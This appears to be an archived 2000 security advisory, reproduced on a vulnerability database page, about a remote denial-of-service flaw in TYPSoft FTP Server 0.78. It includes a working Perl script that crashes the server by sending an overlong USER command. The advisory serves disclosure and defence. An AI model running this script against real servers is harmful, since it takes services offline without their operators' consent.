Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

typsoft-ftpd.txt

🗓️ 12 Sep 2000 00:00:00Reported by DethyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

TYPSoft FTP Server has a remote DoS vulnerability from long command inputs causing crashes.

Code
`  
*******************************************  
+ TYPSoft FTP Server remote DoS Problem +  
*******************************************  
# Advisory by dethy #  
# www.synnergy.net #  
|=========================================|  
  
Advisory # 12  
  
Vulnerable: TYPSoft FTP Server 0.78 [ although 0.7X are also vulnerable ]  
Systems : Win9X, WinNT  
Product : http://www.multimania.com/typsoft/  
Discovery : [email protected]  
  
" Another trivial bug. "  
  
Description  
-----------  
  
TYPSoft FTP is a Freeware FTP server, with all the necessary  
features to facilitate beginners and advanced users.  
  
  
Vulnerability  
-------------  
  
TYPSoft FTP Server does not correctly deal with long commands  
over 2048 bytes [ 2k ]. So by sending a long 'user', 'pass',  
'cwd', etc, causing the server to hang and increase system resources.  
The process will not be active until it is manually restarted.  
  
  
Exploit  
-------  
  
simple script to send a long 'user' command to the server, resulting  
in the ftpd crashing.  
  
================<cut>==================  
#!/usr/bin/perl  
use Getopt::Std;  
use IO::Socket;  
getopts('s:', \%args);  
if(!defined($args{s})){&usage;}  
$serv = $args{s};  
$foo = "A"; $number = 2048;   
$data .= $foo x $number; $EOL="\015\012";  
$remote = IO::Socket::INET->new(  
Proto => "tcp",  
PeerAddr => $args{s},  
PeerPort => "ftp(21)",  
) || die("Unable to connect to ftp port at $args{s}\n");  
$remote->autoflush(1);  
print $remote "USER $data". $EOL;  
while (<$remote>){ print }  
print("\nCrash was successful !\n");  
  
sub usage {die("\n$0 -s <server>\n\n");}  
================</cut>====================  
  
Solution  
--------  
  
The vendor [ [email protected] ] has been contacted, wait until a patched version   
comes out or use an alternative product.  
  
  
Disclaimer  
----------  
  
Synnergy Networks may not be held liable for the use and/or potential effects of these  
programs or advisories, nor the content contained within. Use them at your own risk.  
  
---------------------------------------------------------------------------------------  
Web : http://www.synnergy.net  
E-Mail : [email protected]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Sep 2000 00:00Current
7.4High risk
Vulners AI Score7.4
typsoft ftp serverremote dosvulnerabilitycommand inputcrashworkaround.
24